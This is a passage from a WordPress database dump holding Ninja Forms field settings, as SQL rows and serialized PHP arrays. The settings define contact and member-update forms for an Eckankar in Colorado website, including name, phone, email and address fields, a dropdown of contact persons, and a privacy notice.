Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:7;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(481,10,'key','listselect_146','key','listselect_146'),(482,10,'container_class','one-half first','container_class','one-half first'),(483,10,'parent_id','2','parent_id','2'),(12218,380,'user_address_2','0','user_address_2','0'),(12219,380,'user_city','0','user_city','0'),(12217,380,'user_address_1','0','user_address_1','0'),(12215,380,'last_name','0','last_name','0'),(12216,380,'from_name','0','from_name','0'),(12214,380,'first_name','0','first_name','0'),(12213,380,'datepicker','0','datepicker','0'),(12212,380,'mask','(999) 999-9999','mask','(999) 999-9999'),(12167,379,'from_name','0','from_name','0'),(12168,379,'user_address_1','0','user_address_1','0'),(12169,379,'user_address_2','0','user_address_2','0'),(12189,379,'show_desc','0','show_desc','0'),(12190,379,'desc_pos','none','desc_pos','none'),(12191,379,'desc_text','','desc_text',''),(12192,379,'element_class','','element_class',''),(12193,379,'required','1','required','1'),(12194,379,'key','email_23','key','email_23'),(12195,379,'default','','default',''),(12196,379,'container_class','one-half first','container_class','one-half first'),(12197,379,'parent_id','8','parent_id','8'),(12198,379,'idAttribute','id','idAttribute','id'),(12199,379,'field_label','Email','field_label','Email'),(12200,379,'field_key','email_23','field_key','email_23'),(12201,379,'custom_name_attribute','email','custom_name_attribute','email'),(12202,379,'personally_identifiable','1','personally_identifiable','1'),(12203,379,'value','','value',''),(12204,380,'objectType','Field','objectType','Field'),(12205,380,'objectDomain','fields','objectDomain','fields'),(12206,380,'editActive','','editActive',''),(12207,380,'order','4','order','4'),(12208,380,'type','phone','type','phone'),(12209,380,'def_id','15','def_id','15'),(12210,380,'label','Phone','label','Phone'),(12211,380,'label_pos','above','label_pos','above'),(515,13,'objectType','Field','objectType','Field'),(516,13,'objectDomain','fields','objectDomain','fields'),(517,13,'editActive','','editActive',''),(518,13,'order','7','order','7'),(519,13,'type','listselect','type','listselect'),(520,13,'label','Select The Person You Would Like To Contact','label','Select The Person You Would Like To Contact'),(521,13,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(522,13,'label_pos','above','label_pos','above'),(523,13,'list_type','dropdown','list_type','dropdown'),(524,13,'multi_size','5','multi_size','5'),(525,13,'list_show_value','1','list_show_value','1'),(526,13,'list','a:0:{}','list','a:0:{}'),(527,13,'user_info_field_group','','user_info_field_group',''),(528,13,'calc_auto_include','0','calc_auto_include','0'),(529,13,'user_state','0','user_state','0'),(530,13,'num_sort','0','num_sort','0'),(531,13,'admin_label','','admin_label',''),(532,13,'show_help','0','show_help','0'),(533,13,'help_text','','help_text',''),(534,13,'show_desc','0','show_desc','0'),(535,13,'desc_pos','none','desc_pos','none'),(536,13,'desc_text','','desc_text',''),(537,13,'element_class','','element_class',''),(538,13,'required','1','required','1'),(539,13,'options','a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Initiator-Marcie Tucker\";s:5:\"value\";s:23:\"Initiator-Marcie Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"ESA/Initiator-Barry Frost\";s:5:\"value\";s:25:\"esa-initiator-barry-frost\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"2\";}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:29:\"ESA/Initiator-Gardiner Tucker\";s:5:\"value\";s:29:\"ESA/Initiator-Gardiner Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"4\";}}','options','a:4:{i:0;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"0\";}i:1;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:23:\"Initiator-Marcie Tucker\";s:5:\"value\";s:23:\"Initiator-Marcie Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"1\";}i:2;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:25:\"ESA/Initiator-Barry Frost\";s:5:\"value\";s:25:\"esa-initiator-barry-frost\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"2\";}i:3;a:8:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:29:\"ESA/Initiator-Gardiner Tucker\";s:5:\"value\";s:29:\"ESA/Initiator-Gardiner Tucker\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:5:\"order\";s:1:\"4\";}}'),(16927,204,'drawerDisabled','','drawerDisabled',''),(540,13,'key','select_the_person_you_would_like_to_contact_1613166666321','key','select_the_person_you_would_like_to_contact_1613166666321'),(541,13,'container_class','one-half','container_class','one-half'),(542,13,'drawerDisabled','','drawerDisabled',''),(543,13,'parent_id','2','parent_id','2'),(544,14,'objectType','Field','objectType','Field'),(545,14,'objectDomain','fields','objectDomain','fields'),(546,14,'editActive','','editActive',''),(547,14,'order','8','order','8'),(548,14,'type','textarea','type','textarea'),(549,14,'label','Enter Your Message Here','label','Enter Your Message Here'),(550,14,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(551,14,'label_pos','above','label_pos','above'),(552,14,'default_value','','default_value',''),(553,14,'textarea_rte','0','textarea_rte','0'),(554,14,'textarea_media','0','textarea_media','0'),(555,14,'disable_rte_mobile','0','disable_rte_mobile','0'),(556,14,'input_limit','','input_limit',''),(557,14,'input_limit_type','char','input_limit_type','char'),(558,14,'calc_auto_include','0','calc_auto_include','0'),(559,14,'num_sort','0','num_sort','0'),(560,14,'admin_label','','admin_label',''),(561,14,'show_help','0','show_help','0'),(562,14,'help_text','','help_text',''),(563,14,'show_desc','0','show_desc','0'),(564,14,'desc_pos','none','desc_pos','none'),(565,14,'desc_text','','desc_text',''),(566,14,'element_class','','element_class',''),(567,14,'required','1','required','1'),(568,14,'default','','default',''),(569,14,'key','textarea_150','key','textarea_150'),(570,14,'placeholder','','placeholder',''),(571,14,'container_class','','container_class',''),(572,14,'manual_key','','manual_key',''),(573,14,'parent_id','2','parent_id','2'),(17639,638,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.'),(17637,638,'label','HTML','label','HTML'),(17638,638,'type','html','type','html'),(17636,638,'idAttribute','id','idAttribute','id'),(17635,638,'order','17','order','17'),(17634,638,'editActive','','editActive',''),(17633,637,'drawerDisabled','','drawerDisabled',''),(17632,637,'key','html_1663800713464','key','html_1663800713464'),(17631,637,'element_class','','element_class',''),(591,16,'objectType','Field','objectType','Field'),(592,16,'objectDomain','fields','objectDomain','fields'),(593,16,'editActive','','editActive',''),(594,16,'order','10','order','10'),(595,16,'type','submit','type','submit'),(596,16,'label','Submit','label','Submit'),(597,16,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(598,16,'show_help','0','show_help','0'),(599,16,'help_text','','help_text',''),(600,16,'show_desc','0','show_desc','0'),(601,16,'desc_pos','none','desc_pos','none'),(602,16,'desc_text','','desc_text',''),(603,16,'processing_label','Processing','processing_label','Processing'),(604,16,'element_class','','element_class',''),(605,16,'key','submit_152','key','submit_152'),(606,16,'container_class','','container_class',''),(607,16,'parent_id','2','parent_id','2'),(8192,34,'custom_name_attribute','address','custom_name_attribute','address'),(8193,34,'personally_identifiable','1','personally_identifiable','1'),(8194,34,'value','','value',''),(8195,35,'editActive','','editActive',''),(8196,35,'field_label','City','field_label','City'),(8197,35,'field_key','city_216','field_key','city_216'),(8198,35,'default','','default',''),(8199,35,'container_class','one-half','container_class','one-half'),(8200,35,'manual_key','','manual_key',''),(8201,35,'custom_mask','','custom_mask',''),(8202,35,'custom_name_attribute','city','custom_name_attribute','city'),(8203,35,'personally_identifiable','','personally_identifiable',''),(8204,35,'value','','value',''),(8205,36,'editActive','','editActive',''),(8206,36,'field_label','State','field_label','State'),(8207,36,'field_key','listselect_218','field_key','listselect_218'),(8208,36,'container_class','one-half first','container_class','one-half first'),(8209,37,'editActive','','editActive',''),(8210,37,'field_label','Country','field_label','Country'),(8211,37,'field_key','listcountry_219','field_key','listcountry_219'),(8212,37,'container_class','one-half','container_class','one-half'),(8213,37,'value','US','value','US'),(8214,38,'editActive','','editActive',''),(8215,38,'field_label','hr','field_label','hr'),(8216,38,'field_key','hr_207','field_key','hr_207'),(8217,38,'container_class','','container_class',''),(8218,39,'editActive','','editActive',''),(8219,39,'field_label','If You Have Comments To Add - Please Enter Them Here','field_label','If You Have Comments To Add - Please Enter Them Here'),(8220,39,'field_key','textarea_210','field_key','textarea_210'),(8221,39,'placeholder','','placeholder',''),(8222,39,'container_class','','container_class',''),(8223,39,'manual_key','','manual_key',''),(8224,39,'value','','value',''),(17041,599,'show_desc','0','show_desc','0'),(17040,599,'desc_el','div','desc_el','div'),(17617,636,'label','HTML','label','HTML'),(17618,636,'type','html','type','html'),(8231,41,'editActive','','editActive',''),(8232,41,'field_label','Submit','field_label','Submit'),(8233,41,'field_key','submit_212','field_key','submit_212'),(8234,41,'container_class','','container_class',''),(8191,34,'custom_mask','','custom_mask',''),(8190,34,'manual_key','','manual_key',''),(8189,34,'container_class','one-half first','container_class','one-half first'),(8188,34,'default','','default',''),(8187,34,'field_key','address_213','field_key','address_213'),(8186,34,'field_label','Street Address Â  Â (please fill in if adding or updating mailing address)','field_label','Street Address Â  Â (please fill in if adding or updating mailing address)'),(8184,33,'value','','value',''),(8185,34,'editActive','','editActive',''),(8183,33,'personally_identifiable','1','personally_identifiable','1'),(8182,33,'custom_name_attribute','email','custom_name_attribute','email'),(8181,33,'container_class','one-half','container_class','one-half'),(8180,33,'default','','default',''),(8179,33,'field_key','email_204','field_key','email_204'),(8178,33,'field_label','Email    (please fill in if adding or updating email)','field_label','Email    (please fill in if adding or updating email)'),(8177,33,'editActive','','editActive',''),(8176,32,'value','','value',''),(8175,32,'personally_identifiable','1','personally_identifiable','1'),(8174,32,'custom_name_attribute','phone','custom_name_attribute','phone'),(8173,32,'custom_mask','','custom_mask',''),(8172,32,'manual_key','','manual_key',''),(8171,32,'container_class','one-half first','container_class','one-half first'),(8170,32,'default','','default',''),(8169,32,'field_key','phone_205','field_key','phone_205'),(8168,32,'field_label','Phone','field_label','Phone'),(8167,32,'editActive','','editActive',''),(8166,31,'value','','value',''),(8165,31,'personally_identifiable','1','personally_identifiable','1'),(8164,31,'custom_name_attribute','lname','custom_name_attribute','lname'),(8163,31,'container_class','one-half','container_class','one-half'),(8162,31,'default','','default',''),(8161,31,'field_key','lastname_203','field_key','lastname_203'),(8160,31,'field_label','Last Name','field_label','Last Name'),(8159,31,'editActive','','editActive',''),(8158,30,'value','','value',''),(8157,30,'personally_identifiable','','personally_identifiable',''),(8156,30,'custom_name_attribute','','custom_name_attribute',''),(8155,30,'custom_mask','','custom_mask',''),(8154,30,'manual_key','','manual_key',''),(8153,30,'container_class','one-half first ','container_class','one-half first '),(8152,30,'default','','default',''),(8151,30,'field_key','textbox_202','field_key','textbox_202'),(8150,30,'field_label','First Name','field_label','First Name'),(8149,30,'editActive','','editActive',''),(8148,29,'drawerDisabled','','drawerDisabled',''),(8147,29,'container_class','','container_class',''),(8146,29,'field_key','html_201','field_key','html_201'),(8145,29,'field_label','Text','field_label','Text'),(8144,29,'editActive','','editActive',''),(955,29,'type','html','type','html'),(956,29,'order','1','order','1'),(957,29,'fav_id','','fav_id',''),(958,29,'def_id','','def_id',''),(959,29,'label','Text','label','Text'),(960,29,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(961,29,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Add/Update Email or Address</span></span></span></strong></span></h3>\r\n<p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;\">Your Information Is Safe</span></strong>\r\nWe will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regardingÂ Eckankar in Colorado events or news.</p>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Add/Update Email or Address</span></span></span></strong></span></h3>\r\n<p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;\">Your Information Is Safe</span></strong>\r\nWe will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regardingÂ Eckankar in Colorado events or news.</p>'),(962,29,'desc_el','div','desc_el','div'),(963,29,'show_desc','0','show_desc','0'),(964,29,'desc_pos','none','desc_pos','none'),(965,29,'desc_text','','desc_text',''),(966,29,'element_class','','element_class',''),(967,29,'default','<p><font color=\"#23507d\"><span style=\"font-size: 28px;\"><b>Members</b></span></font></p>\n<p><span style=\"color: rgb(51, 51, 51);font-size: 22px;\">Add/Update Email or Mailing Address</span></p>\n<p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;font-size:20px;\"><br>Your Information Is Safe</span></strong></p>\n<p style=\"padding-left: 30px; font-size:18px;\">We will never share your personal information with anyone. Your email address and any other information you give us will be held securely and only used to communicate regarding Eckankar in Colorado events or news.</p>','default','<p><font color=\"#23507d\"><span style=\"font-size: 28px;\"><b>Members</b></span></font></p>\n<p><span style=\"color: rgb(51, 51, 51);font-size: 22px;\">Add/Update Email or Mailing Address</span></p>\n<p style=\"padding-left: 30px;\"><strong><span style=\"color: #000000;font-size:20px;\"><br>Your Information Is Safe</span></strong></p>\n<p style=\"padding-left: 30px; font-size:18px;\">We will never share your personal information with anyone. 